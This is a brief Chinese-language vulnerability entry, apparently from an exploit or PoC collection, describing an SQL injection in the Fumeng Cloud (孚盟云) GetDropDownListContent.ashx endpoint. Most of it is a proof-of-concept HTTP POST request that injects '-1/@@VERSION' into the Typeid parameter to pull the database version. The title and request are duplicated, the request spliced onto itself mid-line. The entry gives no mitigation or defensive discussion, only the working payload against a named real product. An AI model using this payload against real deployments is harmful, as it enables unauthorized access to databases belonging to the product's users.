漏洞描述
孚盟云 GetDropDownListContent.ashx SQL注入漏洞
孚盟云 GetDropDownListContent.ashx SQL注入漏洞
PoC代码
POST /Ajax/GetDropDownListContent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=getType&Typeid=-1/@@VERSIONPOST /Ajax/GetDropDownListContent.ashx HTTP/1.1
Content-Type: application/x-www-form-urlencoded
action=getType&Typeid=-1/@@VERSION